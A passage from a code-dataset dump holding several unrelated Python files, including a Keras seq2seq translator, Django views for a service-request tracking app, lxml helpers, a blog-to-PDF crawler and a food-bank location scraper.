print(\"Kevin \" + str(kevin_count))\n elif(stuart_count > kevin_count):\n print(\"Stuart \" + str(stuart_count))\n else:\n print(\"Draw\")\n\ngetHighestCount(\"BANANA\")","sub_path":"MinionGame.py","file_name":"MinionGame.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268489771","text":"\"\"\" module to methods xml file \"\"\"\n\nimport logging\nimport itertools\n\nfrom lxml import etree\nfrom xml.dom.minidom import parseString\n\nfrom documentstore_migracao import config\nfrom documentstore_migracao.utils import string, convert_html_body, files\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef str2objXML(_string):\n _string = string.normalize(_string)\n try:\n parser = 
etree.HTMLParser(remove_blank_text=True, recover=True)\n return etree.fromstring(\"%s\" % (_string), parser=parser)\n except etree.XMLSyntaxError as e:\n logger.exception(e)\n return etree.fromstring(\"\")\n\n\ndef file2objXML(file_path):\n return loadToXML(file_path)\n\n\ndef objXML2file(file_path, obj_xml, pretty=False):\n files.write_file_binary(\n file_path,\n etree.tostring(\n obj_xml,\n doctype=config.DOC_TYPE_XML,\n xml_declaration=True,\n method=\"xml\",\n encoding=\"utf-8\",\n pretty_print=pretty,\n ),\n )\n\n\ndef prettyPrint_format(xml_string):\n return parseString(xml_string).toprettyxml()\n\n\ndef loadToXML(file):\n \"\"\"Parses `file` to produce an etree instance.\n\n The XML can be retrieved given its filesystem path,\n an URL or a file-object.\n \"\"\"\n parser = etree.XMLParser(remove_blank_text=True, no_network=True)\n xml = etree.parse(file, parser)\n return xml\n","sub_path":"documentstore_migracao/utils/xml.py","file_name":"xml.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"270319621","text":"from keras import layers, models\nfrom keras import datasets\nfrom keras import backend as K\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib import ticker\nfrom keras.utils import plot_model\nfrom keras.callbacks import EarlyStopping, ModelCheckpoint\nimport numpy as np\n\nbatch_size = 64\nepochs = 100\nlatent_dim = 256\nnum_samples = 10000 #학습 데이터 개수\ndata_path = \"seq2seq_keras/data/Corpus10/eng2kor.txt\"\n\ninput_texts = []\ntarget_texts = []\ninput_characters = set()\ntarget_characters = set()\n\nwith open(data_path, 'r', encoding='utf-8') as f:\n lines = f.read().split(\"\\n\")\n\nfor idx, line in enumerate(lines[: min(num_samples, len(lines) - 1)]):\n if len(line.split(\"\\t\")) < 2 :\n continue\n input_text, target_text = line.split(\"\\t\")[:2]\n target_text = \"\\t\" + target_text + \"\\n\"\n input_texts.append(input_text)\n target_texts.append(target_text)\n for char in input_text:\n if char not in input_characters:\n input_characters.add(char)\n for char in target_text:\n if char not in target_characters:\n target_characters.add(char)\n\ninput_characters = sorted(list(input_characters))\ntarget_characters = sorted(list(target_characters))\nnum_encoder_tokens = len(input_characters)\nnum_decoder_tokens = len(target_characters)\nmax_encoder_seq_length = max([len(txt) for txt in input_texts])\nmax_decoder_seq_length = max([len(txt) for txt in target_texts])\n\nprint('Number of samples:', len(input_texts))\nprint('Number of unique input tokens:', num_encoder_tokens)\nprint('Number of unique output tokens:', num_decoder_tokens)\nprint('Max sequence length for inputs:', max_encoder_seq_length)\nprint('Max sequence length for outputs:', max_decoder_seq_length)\n\n#문자 -> 숫자 변환용 사전\ninput_token_index = dict([(char, i) for i, char in enumerate(input_characters)])\ntarget_token_index = dict([(char, i) for i, char in enumerate(target_characters)])\n\n#학습에 사용할 데이터를 담을 3차원 배열\nencoder_input_data = np.zeros((len(input_texts), max_encoder_seq_length, num_encoder_tokens), dtype='float32')\ndecoder_input_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\ndecoder_target_data = np.zeros((len(input_texts), max_decoder_seq_length, num_decoder_tokens), dtype='float32')\n\n# 문장을 문자 단위로 원핫 인코딩하면서 학습용 데이터를 만듬\nfor i, (input_text, target_text) in enumerate(zip(input_texts, target_texts)) :\n for t, char in 
enumerate(input_text):\n encoder_input_data[i, t, input_token_index[char]] = 1.\n for t, char in enumerate(target_text):\n decoder_input_data[i, t, target_token_index[char]] = 1.\n if t > 0:\n decoder_target_data[i, t-1, target_token_index[char]] = 1.\n\n# 인코더 생성\nencoder_inputs = layers.Input(shape=(None, num_encoder_tokens))\nencoder_outputs, state_h, state_c = layers.LSTM(latent_dim, return_state=True)(encoder_inputs) #출력은 사용하지 않는다.\nencoder_states = [state_h, state_c]\n\n# 디코더 생성\ndecoder_inputs = layers.Input(shape=(None, num_decoder_tokens))\ndecoder_outputs, _, _ = layers.LSTM(latent_dim, return_sequences=True, return_state=True)(decoder_inputs, initial_state=encoder_states)\ndecoder_outputs = layers.Dense(num_decoder_tokens, activation='softmax')(decoder_outputs)\n\n# 모델생성/훈련\nmodel = models.Model([encoder_inputs, decoder_inputs], decoder_outputs)\nmodel.summary()\nmodel.compile(optimizer='rmsprop', loss='categorical_crossentropy')\ncallbackList = [\n EarlyStopping(patience=7, monitor='val_loss'),\n ModelCheckpoint(filepath='seq2seq_train_model.h5', monitor='val_loss', save_best_only=True)\n\n]\nmodel.fit([encoder_input_data, decoder_input_data], decoder_target_data,\n batch_size=batch_size, epochs=epochs, validation_split=0.2, verbose=2, callbacks=callbackList)\n\n# 추론(테스트)\n\n# 추론 모델 생성\nencoder_model = models.Model(encoder_inputs, encoder_states)\n\ndecoder_state_input_h = layers.Input(shape=(latent_dim,))\ndecoder_state_input_c = layers.Input(shape=(latent_dim,))\ndecoder_states_inputs = [decoder_state_input_h, decoder_state_input_c]\ndecoder_outputs, state_h, state_c = layers.LSTM(latent_dim, return_sequences=True, return_state=True)(decoder_inputs, initial_state=decoder_states_inputs)\ndecoder_states = [state_h, state_c]\ndecoder_outputs = layers.Dense(num_decoder_tokens, activation='softmax')(decoder_outputs)\ndecoder_model = models.Model(\n [decoder_inputs] + decoder_states_inputs,\n [decoder_outputs] + decoder_states\n)\n\n# 숫자 -> 문자 변환용 사전\nreverse_input_char_index = {i:char for char, i in input_token_index.items()}\nreverse_target_char_index = {i:char for char, i in target_token_index.items()}\n\ndef decode_sequence(input_seq) :\n # 입력 문장을 인코딩\n states_value = encoder_model.predict(input_seq)\n\n # 디코더의 입력으로 쓸 단일 문자\n target_seq = np.zeros((1,1, num_decoder_tokens))\n # 첫입력은 시작 문자인 '\\t'로 설정\n target_seq[0, 0, target_token_index['\\t']] = 1.\n\n # 문장 생성\n stop_condition = False\n decoded_sentence = ''\n while not stop_condition :\n # 이전의 출력, 상태를 디코더에 넣어서 새로운 출력, 상태를 얻음\n # 이전 문자와 상태로 다음 문자와 상태를 얻는다고 보면 됨.\n output_tokens, h, c = decoder_model.predict([target_seq] + states_value)\n # 사전을 사용해서 원핫인코딩 출력을 실제 문자로 변환\n sampled_token_index = np.argmax(output_tokens[0, -1, :])\n sampled_char = reverse_target_char_index[sampled_token_index]\n decoded_sentence += sampled_char\n\n # 종료 문자가 나왔거나 문장 길이가 한계를 넘으면 종료\n if (sampled_char == '\\n' or len(decoded_sentence) > max_decoder_seq_length):\n stop_condition = True\n\n # 디코더의 다음 입력으로 쓸 데이터 갱신\n target_seq = np.zeros((1, 1, num_decoder_tokens))\n target_seq[0, 0, sampled_token_index] = 1.\n\n states_value = [h, c]\n\n return decoded_sentence\n\nfor seq_index in range(30) :\n input_seq = encoder_input_data[seq_index:seq_index+1]\n decoded_sentence = decode_sequence(input_seq)\n print('\"{}\" -> \"{}\"'.format(input_texts[seq_index], 
decoded_sentence.strip()))","sub_path":"seq2seq_keras/seq2seq_with_keras.py","file_name":"seq2seq_with_keras.py","file_ext":"py","file_size_in_byte":6383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"585832742","text":"# Given an array of integers and an integer k, you need to find the total number of continuous subarrays whose sum equals to k.\n#\n# Example 1:\n#\n#\n# Input:nums = [1,1,1], k = 2\n# Output: 2\n#\n#\n#  \n# Constraints:\n#\n#\n# \tThe length of the array is in range [1, 20,000].\n# \tThe range of numbers in the array is [-1000, 1000] and the range of the integer k is [-1e7, 1e7].\n#\n#\n\n\nclass Solution:\n def subarraySum(self, nums: List[int], k: int) -> int:\n sums = 0\n freq = {}\n freq[sums] = 1\n ans = 0\n for i, ele in enumerate(nums):\n sums += ele\n if sums - k in freq:\n ans += freq[sums - k]\n freq[sums] = freq.get(sums, 0) + 1\n return ans\n","sub_path":"solutions/560-subarray-sum-equals-k/subarray-sum-equals-k.py","file_name":"subarray-sum-equals-k.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551839117","text":"# encoding: utf-8\n\nimport traceback\nimport pandas as pd\n\nfrom tqdm import tqdm\nfrom pathlib import Path\n\nfrom typing import (\n List,\n Union,\n)\n\n\ndef load(path: Path, columns: Union[str, List[str]] = None) -> pd.DataFrame:\n \n if isinstance(columns, str):\n columns = [columns]\n elif (not isinstance(columns, List)) and columns is not None:\n raise ValueError(\n f\"type of columns unknown: {type(columns)}. \"\n f\"Should be one of a str or list[str].\"\n ) \n \n return _load(path, columns)\n\n\ndef _load(path: Path, columns: List[str]) -> pd.DataFrame:\n \n def load_dir(path: Path) -> pd.DataFrame:\n try:\n return pd.concat(load_file(p) for p in path.iterdir())\n except:\n # traceback.print_exc()\n pass\n \n def load_file(path: Path) -> pd.DataFrame:\n try:\n if path.name.startswith('chat_record'):\n return pd.read_csv(path, sep='\\t', header=None)\n except:\n pass\n \n df = pd.concat(load_dir(p) for p in tqdm(list(path.iterdir())))\n \n if 13 == len(df.columns):\n df.columns = [\n '_id',\n 'platform',\n 'server_id',\n 'role_uid',\n 'name',\n 'level',\n 'vip',\n 'target_uid',\n 'channel',\n 'msg_type',\n 'is_audio',\n 'chat_content',\n 'time',\n ]\n elif 27 == len(df.columns):\n df.columns = [\n '_id',\n 'platform',\n 'server_id',\n 'role_uid',\n 'role_name',\n 'role_level',\n 'role_vip',\n \n 'target_uid',\n 'target_name',\n 'target_level',\n 'target_vip',\n \n 'channel',\n 'msg_type',\n 'is_audio',\n 'chat_content',\n 'time',\n \n 'role_is_ai',\n 'target_is_ai',\n 'role_corpus_id',\n 'role_corpus_title',\n 'role_country_id',\n 'role_country_title',\n 'target_corpus_id',\n 'target_corpus_title',\n 'target_country_id',\n 'target_country_title',\n 'charge',\n ]\n else:\n raise ValueError(f'Expected 13 or 27 fields, Now get {len(df.columns)} fields')\n \n df['chat_content'] = df['chat_content'].apply(lambda x: x[1:-1] if \"'\"==x[0] and \"'\"==x[-1] else x)\n \n return df if columns is None else df[columns]\n\n\nif __name__ == '__main__':\n # path = Path('~/data/yk-zhanguo-chat/tw').expanduser()\n path = Path('~/data/yk-zhanguo-chat/dl').expanduser()\n path\n \n df = load(path, columns='chat_content')\n 
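# load() concatenates every chat_record file found under path; passing a\n    # single column name returns just that one-column frame.\n    print(df.shape)  # quick sanity check (illustrative)\n    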
df.head(3)\n","sub_path":"ads/train/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"66927598","text":"\"\"\"\nSuperclass for data handlers\n\"\"\"\nfrom typing import Any\n\n\nclass DataHandlerSuper:\n    def __init__(\n        self: Any,\n        fpg_connector: Any = None,\n        database: Any = None\n    ) -> None:\n        self.fpg_connector = fpg_connector\n        self.database = database\n        self.current_time = None\n        self.current_price = None\n","sub_path":"lib/py/fpg/data_manager/data_manager_parent.py","file_name":"data_manager_parent.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"477457222","text":"from .models import Request, WorkType, Inventory, Equipment, ExecutionStatus, RefuseReason\nfrom usersapp.models import Location, Department, Pavilion, Room, UserProfile\nfrom django.views import generic\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom django.db import transaction\nfrom .forms import RequestForm, RequestDoneCommentForm, RefuseForm, FilteringForm\nfrom usersapp.forms import LocationForm\nfrom django.http import Http404, QueryDict\nfrom .functions import fetch_location_from_form, dispatcher_fields_handling\nfrom .functions import work_type_inventory_equipment_fields_handling\nfrom .functions import prepare_applicants_location_f, filter_requests\nimport datetime\nfrom django.http import HttpResponse\n\nUSER = get_user_model()\n\n# A view built on Django's generic class-based view.\nclass RequestListView(LoginRequiredMixin, generic.ListView):\n    \"\"\" Renders the list of requests on the main page of the site. \"\"\"\n    model = Request\n    paginate_by = 14\n    context_object_name = 'requests'\n    template_name = 'requestsapp/requests.html'\n    queryset = Request.objects.order_by('-last_change_date')\n\n    def get_queryset(self):\n        # For executors, show only requests waiting to be started.\n        if self.request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists():\n            return super(RequestListView, self).get_queryset().filter(execution_status__status=settings.WAITING_FOR_START)\n\n        # Applicants see only the requests they created.\n        elif self.request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n            return super(RequestListView, self).get_queryset().filter(creator=self.request.user)\n\n        # For dispatchers, honour the filtering parameters of the request list.\n        elif self.request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n            # First fetch the whole request list via the base-class method.\n            requests = super(RequestListView, self).get_queryset()\n            # Return the queryset filtered by the GET parameters.\n            return filter_requests(requests, self.request.GET)\n        else:\n            return super(RequestListView, self).get_queryset()\n\n    def get_context_data(self, **kwargs):\n        context = super(RequestListView, self).get_context_data(**kwargs)\n        context['filtering_form'] = FilteringForm(initial={\n            'by_exexution_or_refuse_date_start': self.request.GET.get('by_exexution_or_refuse_date_start'),\n            'by_exexution_or_refuse_date_end': self.request.GET.get('by_exexution_or_refuse_date_end'),\n            'by_creator': self.request.GET.get('by_creator'),\n        })\n        if self.request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n            requests = Request.objects.all()\n            context['most_recent_request_pk'] = requests.first().pk\n            context['requests_list_length'] = requests.count()\n        elif self.request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists():\n            requests = Request.objects.filter(execution_status__status=settings.WAITING_FOR_START).all()\n            context['most_recent_request_pk'] = requests.first().pk\n            context['requests_list_length'] = requests.count()\n        q_dict = self.request.GET.dict()\n        if 'page' in q_dict:\n            q_dict.pop('page')\n        q = QueryDict(mutable=True)\n        q.update(q_dict)\n        # HTTPparameters carries the current HTTP parameters into the pagination links.\n        context['HTTPparameters'] = '?' + q.urlencode() + '&' if len(q) > 0 else '?' + q.urlencode()\n        return context\n\n\nclass RequestDetailView(LoginRequiredMixin, generic.DetailView):\n    model = Request\n    template_name = 'requestsapp/request_detail.html'\n\n    def get(self, request, *args, **kwargs):\n        \"\"\" Overrides the base-class method to implement access checks. \"\"\"\n\n        \"\"\" Check that applicants open only the requests they created; for\n        someone else's request they are redirected to the \"your requests\" page.\n        Dispatchers and executors may view all requests, but executors see\n        fewer details, which is enforced by checks in the template.\n        \"\"\"\n        if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists() and self.get_object().creator != request.user:\n            return redirect('requests')\n        elif request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists() and \\\n                self.get_object().execution_status != ExecutionStatus.objects.get_or_create(status=settings.WAITING_FOR_START)[0]:\n            if self.get_object() != request.user.userprofile.taken_request:\n                return redirect('requests')\n        # The base-class code is repeated here because calling super raised an error.\n        self.object = self.get_object()\n        context = self.get_context_data(object=self.object)\n        return self.render_to_response(context)\n\n    def get_context_data(self, **kwargs):\n        \"\"\" Overrides the method to add the status-constant value to the context. \"\"\"\n        # Get the base implementation of the context.\n        context = super(RequestDetailView, self).get_context_data(**kwargs)\n        # So the constant's value is defined in one place instead of being repeated.\n        context['waiting_status_const'] = ExecutionStatus.objects.get_or_create(\n            status=settings.WAITING_FOR_START)[0].status\n        # True when the request was modified after submission (one-second tolerance).\n        context['changed'] = (context['request'].last_change_date -\n                              context['request'].submission_date > datetime.timedelta(seconds=1))\n        return context\n\n\n@login_required\n@transaction.atomic\n@permission_required('requestsapp.add_request')\ndef request_new(request):\n    if request.method == 'POST':\n        request_f = RequestForm(request.POST)\n        location_f = LocationForm(request.POST)\n        if request_f.is_valid() and location_f.is_valid():\n            # 'service' so it is not confused with the request parameter.\n            new_service_request = request_f.save(commit=False)\n\n            # Set the creator.\n            new_service_request.creator = request.user\n            # Set the status to waiting for work to start.\n            if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n                new_service_request.execution_status = ExecutionStatus.objects.get_or_create(\n                    status=settings.WAITING_FOR_START)[0]\n            # Make the creator the applicant if the creator belongs to the applicants group rather than dispatchers.\n            if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n                new_service_request.applicant_profile = request.user.userprofile\n\n            # Dispatchers.\n            if request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n                dispatcher_fields_handling(request, request_f, location_f, new_service_request)\n                # Worth reconsidering whether this is necessary.\n                new_service_request.last_change_date = new_service_request.submission_date\n            # Applicants.\n            else:\n                new_service_request.submission_date = timezone.now()\n                # When the applicant user ticked the checkbox named use_applicant_loc.\n                if request.POST.get('use_applicant_loc', False):\n                    # A Location object is created or fetched.\n                    new_service_request.location = request.user.userprofile.create_or_fetch_location_object()[0]\n                else:\n                    new_service_request.location = fetch_location_from_form(location_f)\n\n            work_type_inventory_equipment_fields_handling(request_f, new_service_request)\n            new_service_request.save()\n            return redirect('request_detail', str(new_service_request.pk))\n    else:\n        request_f = RequestForm()\n        location_f = prepare_applicants_location_f(request, False, None)\n\n    return render(request, 'requestsapp/request_edit.html', {\n        'request_f': request_f,\n        # See the notes about the 'form' key in the location_fields.html template.\n        'form': location_f,\n    })\n\n\n@login_required\n@transaction.atomic\n@permission_required('requestsapp.change_request')\ndef request_edit(request, pk):\n    changing_service_request = get_object_or_404(Request, pk=pk)\n\n    if changing_service_request.creator != request.user:\n        return redirect('request_detail', str(changing_service_request.pk))\n\n    location = get_object_or_404(Location, pk=changing_service_request.location.pk)\n    sub_date = changing_service_request.submission_date\n    if request.method == 'POST':\n        request_f = RequestForm(request.POST, instance=changing_service_request)\n        location_f = LocationForm(request.POST)\n        if request_f.is_valid() and location_f.is_valid():\n            # 'service' so it is not confused with the request parameter.\n            changing_service_request = request_f.save(commit=False)\n\n            # Set the status to waiting for work to start, because the status field is not shown to applicants.\n            if request.user.groups.filter(name=settings.DEFAULT_APPLICANTS_GROUP_NAME).exists():\n                changing_service_request.execution_status = ExecutionStatus.objects.get_or_create(\n                    status=settings.WAITING_FOR_START)[0]\n\n            # Dispatchers.\n            if request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n                dispatcher_fields_handling(request, request_f, location_f, changing_service_request)\n            # Applicants.\n            else:\n                changing_service_request.submission_date = sub_date\n                # When the applicant user ticked the checkbox named use_applicant_loc.\n                if request.POST.get('use_applicant_loc', False):\n                    # A Location object is created or fetched.\n                    changing_service_request.location = request.user.userprofile.create_or_fetch_location_object()[0]\n                else:\n                    changing_service_request.location = fetch_location_from_form(location_f)\n            work_type_inventory_equipment_fields_handling(request_f, changing_service_request)\n            # TODO Check that last_change_date is updated on change.\n            changing_service_request.save()\n            return redirect('request_detail', str(changing_service_request.pk))\n    else:\n        if request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists():\n            request_f = RequestForm(instance=changing_service_request, initial={\n                'new_or_existing_inventory_number': changing_service_request.inventory.inventory_number,\n                'equipment': changing_service_request.inventory.equipment,\n                'created_by_disp_applicant_profile': changing_service_request.applicant_profile,\n            })\n        else:\n            request_f = RequestForm(instance=changing_service_request, initial={\n                'new_or_existing_inventory_number': changing_service_request.inventory.inventory_number,\n                'equipment': changing_service_request.inventory.equipment\n            })\n        location_f = prepare_applicants_location_f(request, True, changing_service_request.location)\n\n    return render(request, 'requestsapp/request_edit.html', {\n        'request_f': request_f,\n        # See the notes about the 'form' key in the location_fields.html template.\n        'form': location_f,\n        'editing': True\n    })\n\n\n@login_required\n@transaction.atomic\n@permission_required('requestsapp.delete_request')\ndef request_delete(request, pk):\n    try:\n        deleting_request = Request.objects.get(pk=pk)\n    except Request.DoesNotExist:\n        raise Http404\n    else:\n        deleting_request.delete()\n    return redirect('requests')\n\n\n@login_required\n@transaction.atomic\ndef request_take(request, pk):\n    if not request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists():\n        return redirect('requests')\n    else:\n        taking_request = get_object_or_404(Request, pk=pk)\n        request.user.userprofile.taken_request = taking_request\n        request.user.userprofile.save()\n\n        taking_request.execution_status = ExecutionStatus.objects.get_or_create(status=settings.IN_PROGRESS)[0]\n        taking_request.save()\n    return redirect('requests')\n\n\n@login_required\n@transaction.atomic\ndef request_execute(request):\n    if not request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists() or not request.user.userprofile.taken_request:\n        return redirect('requests')\n    else:\n        if request.method == 'POST':\n            form = RequestDoneCommentForm(request.POST)\n            if form.is_valid():\n                taken_request = request.user.userprofile.taken_request\n                taken_request.execution_status = ExecutionStatus.objects.get_or_create(status=settings.DONE)[0]\n                taken_request.executor_comment = form.cleaned_data['executor_comments']\n                taken_request.executor = request.user\n                taken_request.execution_or_refuse_date = timezone.now()\n                taken_request.save()\n                request.user.userprofile.taken_request = None\n                request.user.userprofile.save()\n    return redirect('requests')\n\n\n@login_required\n@transaction.atomic\ndef request_refuse(request):\n    if not request.user.groups.filter(name=settings.DEFAULT_EXECUTORS_GROUP_NAME).exists() or not request.user.userprofile.taken_request:\n        return redirect('requests')\n    else:\n        if request.method == 'POST':\n            form = RefuseForm(request.POST)\n            if form.is_valid():\n                taken_request = request.user.userprofile.taken_request\n                taken_request.execution_status = ExecutionStatus.objects.get_or_create(status=settings.REFUSED)[0]\n                if form.cleaned_data['new_reason']:\n                    taken_request.refuse_reason = RefuseReason.objects.get_or_create(reason=form.cleaned_data['new_reason'])[0]\n                else:\n                    taken_request.refuse_reason = form.cleaned_data['reason']\n                taken_request.executor = request.user\n                taken_request.execution_or_refuse_date = timezone.now()\n                taken_request.save()\n                request.user.userprofile.taken_request = None\n                request.user.userprofile.save()\n    return redirect('requests')\n\n\nclass CreateReportTemplateView(generic.base.TemplateView, LoginRequiredMixin):\n    template_name = 'requestsapp/report.html'\n\n    def dispatch(self, request, *args, **kwargs):\n        if (not self.request.user.groups.filter(name=settings.DEFAULT_DISPATCHERS_GROUP_NAME).exists()):\n            return redirect('requests')\n        return super(CreateReportTemplateView, self).dispatch(request, *args, **kwargs)\n\n    def get_context_data(self, **kwargs):\n        \"\"\" Overrides the base-class method to add the report data to the template context. \"\"\"\n        context = super(CreateReportTemplateView, self).get_context_data(**kwargs)\n\n        start_date = self.request.GET.get('by_exexution_or_refuse_date_start', False)\n        end_date = self.request.GET.get('by_exexution_or_refuse_date_end', False)\n\n        # For displaying the filtering parameters on the report page.\n        context['filters_amount'] = 0\n        if start_date and end_date:\n            context['by_exexution_or_refuse_date_start'] = datetime.datetime.strptime(\n                self.request.GET.get('by_exexution_or_refuse_date_start'), '%Y-%m-%dT%H:%M')\n            context['by_exexution_or_refuse_date_end'] = datetime.datetime.strptime(\n                self.request.GET.get('by_exexution_or_refuse_date_end'), '%Y-%m-%dT%H:%M')\n            context['filters_amount'] += 1\n        if self.request.GET.get('by_creator', False):\n            filtering_creator = USER.objects.get(pk=self.request.GET['by_creator'])\n            context['filtering_creator'] = filtering_creator\n            context['filters_amount'] += 1\n\n        doneRequests2dList = []\n        executors = USER.objects.filter(groups__name=settings.DEFAULT_EXECUTORS_GROUP_NAME)\n        done_st = ExecutionStatus.objects.get_or_create(status=settings.DONE)[0]\n        work_types = [wt for wt in WorkType.objects.all() if wt.requests.filter(execution_status=done_st).count() > 0]\n        if len(executors) > 0 and len(work_types) > 0:\n            # Header row with the request types.\n            doneRequests2dList.append([' ', *[str(wt) for wt in work_types]])\n            bottom_total_amount_row = [0 for t in work_types] + [0]\n            for e in executors:\n                half_of_rate = ' (пол ставки)' if e.userprofile.half_of_rate else ''\n                # The first cell of the row is the executor's login, full name and rate status.\n                new_row_elements = [e.username + ' : ' + str(e.userprofile) + half_of_rate]\n                executor_total_amount = 0\n                for wt in work_types:\n                    # Initial selection of the requests of a given type completed by the executor.\n                    done_by_executors_requests = wt.requests.filter(execution_status=done_st, executor=e)\n\n                    # Apply the report's filter parameters.\n                    done_by_executors_requests = filter_requests(done_by_executors_requests, self.request.GET)\n\n                    # Count the requests completed by the executor.\n                    if e.userprofile.half_of_rate:\n                        done_by_executors_amount = done_by_executors_requests.count() * 2\n                    else:\n                        done_by_executors_amount = done_by_executors_requests.count()\n                    new_row_elements.append(done_by_executors_amount)\n\n                    # Accumulate the executor's total number of completed requests.\n                    executor_total_amount += done_by_executors_amount\n\n                new_row_elements.append(executor_total_amount)\n                doneRequests2dList.append(new_row_elements)\n\n                # Incrementally accumulate the overall totals per request type.\n                bottom_total_amount_row = list(map(lambda total_figure, current_figure: total_figure +\n                    current_figure, bottom_total_amount_row, new_row_elements[1:]))\n\n            doneRequests2dList.append([''] + bottom_total_amount_row)\n        context['done_request_2d_list'] = doneRequests2dList\n        context['types_amount'] = len(work_types)\n        return context\n\n\n# Only dispatchers have delete_request.\n@login_required\n@permission_required('requestsapp.delete_request')\ndef add_new_auto(request, amount):\n    equipment = Equipment.objects.first()\n    for i in range(0, int(amount)):\n        inventory = Inventory.objects.create(\n            equipment=equipment, inventory_number='auto#{0}m'.format(str(datetime.datetime.now().minute)))\n        Request.objects.create(\n            execution_status=ExecutionStatus.objects.get(status=settings.WAITING_FOR_START),\n            creator=request.user, applicant_profile=UserProfile.objects.last(),\n            submission_date=timezone.now(), 
work_type=WorkType.objects.first(),\n description='auto_created#%s' % str(datetime.datetime.now()), inventory=inventory,\n location=Location.objects.first())\n return HttpResponse('successful')\n","sub_path":"requestsapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":21986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"568124100","text":"# -*- coding: utf-8 -*-\n\nimport pdfkit\nimport os\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\n\n# 获取标题列表\ndef get_title_list():\n soup = urlopen('http://www.yinwang.org')\n content = BeautifulSoup(soup.read(), 'html.parser')\n title_list = []\n content_list = content.find_all('li', 'list-group-item')\n for text in content_list:\n title_list.append(text.get_text().strip())\n return title_list\n\n\n# 获取所有页面url\ndef get_url_list():\n soup = urlopen('http://www.yinwang.org')\n content = BeautifulSoup(soup.read(), 'html.parser')\n menu_tag = content.find_all(class_='list-group-item')\n urls = []\n for li in menu_tag:\n url = \"http://www.yinwang.org\" + li.a.get('href')\n urls.append(url)\n return urls\n\n# 将html页面保存到本地\ndef saveHtml(file_name, file_content):\n fp = open(file_name, \"w+b\")\n fp.write(file_content)\n fp.close()\n\n# 将博客转化为pdf文件\ndef savePDF(url, file_name):\n options = {\n 'page-size': 'A4',\n 'zoom':'2.5'\n }\n pdfkit.from_url(url, file_name, options = options)\n\n# 将当前所有文章url保存到文件里\ndef saveCurrUrList(urls, filename, mode = 'a'):\n file = open(filename,mode)\n for i in range(len(urls)):\n file.write(str(urls[i] + '\\n'))\n file.close()\n\nif __name__ == '__main__':\n urls = get_title_list()\n for i in range(73, 77):\n urls = get_url_list()\n title_list = get_title_list()\n print(title_list[i])\n soup = urlopen(urls[i])\n content = BeautifulSoup(soup.read(), 'html.parser')\n saveHtml(os.getcwd() + '/html/' + title_list[i] + '.html', content.encode())\n savePDF(urls[i], os.getcwd() + '/pdf/' + title_list[i] + \".pdf\")\n\n\n\n\n","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"290056277","text":"from urllib.request import urlopen, Request\nimport csv\nfrom bs4 import BeautifulSoup\nfrom geopy.geocoders import Nominatim\ngeolocator = Nominatim(user_agent=\"hacktheworld\")\n\n\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) ' \n 'AppleWebKit/537.11 (KHTML, like Gecko) '\n 'Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}#{'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\n\nreg_url = \"https://ccfoodbank.org/food-locator/\"\nreq = Request(url=reg_url, headers=headers) \nresponse = urlopen(req).read() \n\nsoup = BeautifulSoup(response, features=\"lxml\")\ndivs = soup.find(id=\"storeLocator__storeList\").find_all(\"div\")\nf = open(\"./food_center_info/a.txt\", 'w')\nf.write(str(soup))\nwith open(\"./food_center_info/supermarket.csv\", 'w') as f:\n csvwriter = csv.writer(f)\n\n csvwriter.writerow([\"Name\", \"Address\" , \"Phone #\",\"Open Time\"])\n for div in 